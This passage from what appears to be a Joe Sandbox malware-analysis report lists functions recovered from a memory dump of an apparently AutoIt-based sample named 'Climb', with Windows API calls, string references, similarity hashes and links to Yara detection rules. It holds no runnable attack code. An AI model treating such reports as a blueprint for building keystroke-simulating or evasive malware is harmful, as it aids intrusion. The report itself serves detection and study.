MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,004C1B7B,?,004C1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 004C1A64
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004C1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 004C1A7B

Part of subcall function 004B3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,004A6A79,?,0000015D,?,?,?,?,004A85B0,000000FF,00000000,?,?), ref: 004B3BC5

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004C1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 004C1AF7
__freea.LIBCMT ref: 004C1B22
__freea.LIBCMT ref: 004C1B2E

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: d21798b94a12680de477f6880ce0993c98662eb080ffe9eb4524d50a926000e5
Instruction ID: 5e1ee7ebbdb5a6626e953fd116fbeffe521e766a122f973923149eb7c3da2dbd
Opcode Fuzzy Hash: d21798b94a12680de477f6880ce0993c98662eb080ffe9eb4524d50a926000e5
Instruction Fuzzy Hash: B191D675E002169ADB608E65C851FEF7BB59F0A314F14421FE805E7262E73DDC45CB68

Function 004F1B46 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 004F1C1B
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 004F1C43
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 004F1C67
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 004F1C97
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 004F1D1E
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 004F1D83
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 004F1DEF

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: 6c35911082894d9337a548fe27f61e8870087d95d735f0b75ceec9f09e708fdf
Instruction ID: ca21ca76d17945ec314a76023cab9df7447525f78c10e71b58629d7436507d72
Opcode Fuzzy Hash: 6c35911082894d9337a548fe27f61e8870087d95d735f0b75ceec9f09e708fdf
Instruction Fuzzy Hash: EF91E175A00219DFEB009F95C8C4BFEB7B4FF05715F14802AEA40EB2A1D7B8A945CB58

Function 005043A4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 005043C8
CharUpperBuffW.USER32(?,?), ref: 005044D7
_wcslen.LIBCMT ref: 005044E7
VariantClear.OLEAUT32(?), ref: 0050467C

Part of subcall function 004F169E: VariantInit.OLEAUT32(00000000), ref: 004F16DE
Part of subcall function 004F169E: VariantCopy.OLEAUT32(?,?), ref: 004F16E7
Part of subcall function 004F169E: VariantClear.OLEAUT32(?), ref: 004F16F3

Strings

Incorrect Parameter format, xrefs: 00504403, 005045FE
AUTOIT.ERROR, xrefs: 005044DD, 005044E2

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: 8d25f65f098b417dc8176b8539c97d62ba456c4af5699cc33b4eacf2d7257d8c
Instruction ID: 0ba2a0d8a063c6e5ee005ecca7882b9f1a129d34022a5a969fbe09adf70e23c9
Opcode Fuzzy Hash: 8d25f65f098b417dc8176b8539c97d62ba456c4af5699cc33b4eacf2d7257d8c
Instruction Fuzzy Hash: D59114B46043019FCB10EF25C48096EBBE5BF89718F14892EF98997391DB35E905CF92

Function 0050560A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 004E08FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,004E0831,80070057,?,?,?,004E0C4E), ref: 004E091B
Part of subcall function 004E08FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004E0831,80070057,?,?), ref: 004E0936
Part of subcall function 004E08FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004E0831,80070057,?,?), ref: 004E0944
Part of subcall function 004E08FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004E0831,80070057,?), ref: 004E0954

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 005056AE
_wcslen.LIBCMT ref: 005057B6
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0050582C
CoTaskMemFree.OLE32(?), ref: 00505837

Strings

NULL Pointer assignment, xrefs: 00505880, 005058AF

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: f460aef04f64eee29c4f7c37163725b4b188a7a3573320662b5fa6fbaae657e7
Instruction ID: d13827f3cf73b38cdeaecb7ef3d01c879533a9f48ad67384b8a6a68b43b412b3
Opcode Fuzzy Hash: f460aef04f64eee29c4f7c37163725b4b188a7a3573320662b5fa6fbaae657e7
Instruction Fuzzy Hash: BC911A71D00219EFDF10DFA5D881AEEBBB8FF04304F10856AE915A7291EB749A44DFA4

Function 00512B99 Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00512C1F
GetMenuItemCount.USER32(00000000), ref: 00512C51
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00512C79
_wcslen.LIBCMT ref: 00512CAF
GetMenuItemID.USER32(?,?), ref: 00512CE9
GetSubMenu.USER32(?,?), ref: 00512CF7

Part of subcall function 004E4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 004E43AD
Part of subcall function 004E4393: GetCurrentThreadId.KERNEL32 ref: 004E43B4
Part of subcall function 004E4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,004E2F00), ref: 004E43BB

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00512D7F

Part of subcall function 004EF292: Sleep.KERNEL32 ref: 004EF30A

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: fa52e222b79d6e4a5c740a27da72f33d8453d3e2236b7e0b066d28327161295b
Instruction ID: c93e6033f78ebb544ab966042501d9aa37bcf316dec29dc5d741016780cf1854
Opcode Fuzzy Hash: fa52e222b79d6e4a5c740a27da72f33d8453d3e2236b7e0b066d28327161295b
Instruction Fuzzy Hash: 25719E75A00205AFDB10EF65D845AEEBBB1FF48314F108859E916EB351DB34AD82CB90

Function 004EB881 Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 004EB8C0
GetKeyboardState.USER32(?), ref: 004EB8D5
SetKeyboardState.USER32(?), ref: 004EB936
PostMessageW.USER32(?,00000101,00000010,?), ref: 004EB964
PostMessageW.USER32(?,00000101,00000011,?), ref: 004EB983
PostMessageW.USER32(?,00000101,00000012,?), ref: 004EB9C4
PostMessageW.USER32(?,00000101,0000005B,?), ref: 004EB9E7

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 32220f611f104940c344a9c64213ecfec2508a674656caffb357d854541ebd77
Instruction ID: 620d1b3c22e06adb25e68301181deda4f99a1ec5970260d09c54bd4b16425eef
Opcode Fuzzy Hash: 32220f611f104940c344a9c64213ecfec2508a674656caffb357d854541ebd77
Instruction Fuzzy Hash: FF5102A05087D53EFB3642368C45BBBBEA9DB06305F08848AE1D5569D3C3DCACC4D7A8

Function 004EB6A1 Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 004EB6E0
GetKeyboardState.USER32(?), ref: 004EB6F5
SetKeyboardState.USER32(?), ref: 004EB756
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 004EB782
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 004EB79F
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 004EB7DE
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 004EB7FF

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: a9b94060c05f9c751974dbf7c6ff138c68c2824f16b4412ee8f83b14318761c6
Instruction ID: 6cde1d2a96f42e44f66d06e2b57468b218cb8a2486be46136da628b42217b428
Opcode Fuzzy Hash: a9b94060c05f9c751974dbf7c6ff138c68c2824f16b4412ee8f83b14318761c6
Instruction Fuzzy Hash: D55106A09047D53DFB3253368C15B777EA8EF45305F08848AE0D45AAD2D398EC94D7A9

Function 004B57A1 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,004B5F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 004B57E3
__fassign.LIBCMT ref: 004B585E
__fassign.LIBCMT ref: 004B5879
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 004B589F
WriteFile.KERNEL32(?,FF8BC35D,00000000,004B5F16,00000000,?,?,?,?,?,?,?,?,?,004B5F16,?), ref: 004B58BE
WriteFile.KERNEL32(?,?,00000001,004B5F16,00000000,?,?,?,?,?,?,?,?,?,004B5F16,?), ref: 004B58F7

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 471e2e88fa53e67be12db856418cdf02ca79783393c3e057083ba3178dd284b1
Instruction ID: 56e1019752e546c063e39f2e088f41f3c8f464027bb5a844bf76a4d8652dafc5
Opcode Fuzzy Hash: 471e2e88fa53e67be12db856418cdf02ca79783393c3e057083ba3178dd284b1
Instruction Fuzzy Hash: 5751AEB1A00649AFCB10CFA8D885BEEFBB8EF19310F14411BE955E7291D7349A41CB79

Function 004A3090 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 004A30BB
___except_validate_context_record.LIBVCRUNTIME ref: 004A30C3
_ValidateLocalCookies.LIBCMT ref: 004A3151
__IsNonwritableInCurrentImage.LIBCMT ref: 004A317C
_ValidateLocalCookies.LIBCMT ref: 004A31D1

Strings

csm, xrefs: 004A3166

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 899fa35c542cf9a1ece932f9d075ee384aca8431f15d6202caf71a7a9f3744d1
Instruction ID: f1dff9979afb6e77308edc3925a0efaba068edffcc6e56ed68487164d3fbf329
Opcode Fuzzy Hash: 899fa35c542cf9a1ece932f9d075ee384aca8431f15d6202caf71a7a9f3744d1
Instruction Fuzzy Hash: 7541C534E002089BCF10DF59C885A9FBBB5AF66329F14815AF8146B392E739DF05CB95

Function 004ED7AB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 004EE6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,004ED7CD,?), ref: 004EE714

Part of subcall function 004EE6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,004ED7CD,?), ref: 004EE72D

lstrcmpiW.KERNEL32(?,?), ref: 004ED7F0
MoveFileW.KERNEL32(?,?), ref: 004ED82A
_wcslen.LIBCMT ref: 004ED8B0
_wcslen.LIBCMT ref: 004ED8C6
SHFileOperationW.SHELL32(?), ref: 004ED90C

Strings

\*.*, xrefs: 004ED89E

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: 82e0250412b505dfa0bfe2bf4bb6ec6a93947d4f2705a22c3fb1d6f811253840
Instruction ID: 18a9ed076db6a8e3b5309d2471eb7011c0123a570130f29074e049057d0d5109
Opcode Fuzzy Hash: 82e0250412b505dfa0bfe2bf4bb6ec6a93947d4f2705a22c3fb1d6f811253840
Instruction Fuzzy Hash: 2F417671C052589EDF12FFA6C981ADE77B8BF18345F0004EBA519EB141EB78A788CB54

Function 004F42B9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 004F4310
TranslateAcceleratorW.USER32(?,00000000,?), ref: 004F4367
TranslateMessage.USER32(?), ref: 004F4390
DispatchMessageW.USER32(?), ref: 004F439A
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004F43AB

Strings

(U, xrefs: 004F437D

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID: (U
API String ID: 2256411358-2725093197
Opcode ID: 82ef74e15bc0d8dce84c7c1f812ecfc63f60ee481904e98022b04c0ec20eef15
Instruction ID: 2852a13cbb953ac6b214ac37d9f12dca8e5b50a696f6f570c8e57019dcdafc40
Opcode Fuzzy Hash: 82ef74e15bc0d8dce84c7c1f812ecfc63f60ee481904e98022b04c0ec20eef15
Instruction Fuzzy Hash: F531CC70604349DEEB34CB74D858BB73BB8EB51305F04456BDA52C22A0EB7CA489DB29

Function 00513899 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 005138B8
GetWindowLongW.USER32(?,000000F0), ref: 005138EB
GetWindowLongW.USER32(?,000000F0), ref: 00513920
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00513952
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 0051397C
GetWindowLongW.USER32(?,000000F0), ref: 0051398D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 005139A7

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: be93014cb30c0b6b70175e612b120281e2c16f83ca76740146f634002a1527ed
Instruction ID: f708395224e8419cbab8ed4453761e2afe0b32818d334e7f4a05f36ccb07c03f
Opcode Fuzzy Hash: be93014cb30c0b6b70175e612b120281e2c16f83ca76740146f634002a1527ed
Instruction Fuzzy Hash: 45315770705255AFEB21CF58DCA4FA43BB4FB9A750F1441A4F5048B2B2CB74AD88EB51

Function 004E808D Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004E80D0
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004E80F6
SysAllocString.OLEAUT32(00000000), ref: 004E80F9
SysAllocString.OLEAUT32(?), ref: 004E8117
SysFreeString.OLEAUT32(?), ref: 004E8120
StringFromGUID2.OLE32(?,?,00000028), ref: 004E8145
SysAllocString.OLEAUT32(?), ref: 004E8153

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 587e2f26cb400e2549afa5f9785079f9e0fe92acb09fa841efce4f42e655a9f6
Instruction ID: abdf74b80edf92ae2de08b4233da496f5203328fd41afdda6c279ea583532bc7
Opcode Fuzzy Hash: 587e2f26cb400e2549afa5f9785079f9e0fe92acb09fa841efce4f42e655a9f6
Instruction Fuzzy Hash: 4E219572600219AF9F10DFA9CC84CFB73ACEB09365704842AF909DB290DAB8DC46D764

Function 004E8164 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004E81A9
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004E81CF
SysAllocString.OLEAUT32(00000000), ref: 004E81D2
SysAllocString.OLEAUT32 ref: 004E81F3
SysFreeString.OLEAUT32 ref: 004E81FC
StringFromGUID2.OLE32(?,?,00000028), ref: 004E8216
SysAllocString.OLEAUT32(?), ref: 004E8224

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: ce1fb6f6cdf9e72a0fd8622adfb6b4636ccfb2f52ee971124766b57b00459947
Instruction ID: 8cacddf3112d33fb91d9764469101bf7e5ebfe3ac1ceacf49e91356638acbd9d
Opcode Fuzzy Hash: ce1fb6f6cdf9e72a0fd8622adfb6b4636ccfb2f52ee971124766b57b00459947
Instruction Fuzzy Hash: A7218871600154BF9F10DFB9DC89DAB77ECEB19361704812AFA05CB2A0DAB8DC45D768

Function 004F0E79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 004F0E99
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 004F0ED5

Strings

nul, xrefs: 004F0F0E

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: dcc54203c4f5d5152506507281c143cd0f698e7bea283d1115167061d4756649
Instruction ID: 925447ce91f2a02a5c382513983e99a1614af609bf28cfd99b34a5fd81f3845c
Opcode Fuzzy Hash: dcc54203c4f5d5152506507281c143cd0f698e7bea283d1115167061d4756649
Instruction Fuzzy Hash: 2921807450030EABDB208F25DC04AAB77B8BF94324F204A1AFEA5D72D1D7B49841DB64

Function 004F0F4E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 004F0F6D
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 004F0FA8

Strings

nul, xrefs: 004F0FE0

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
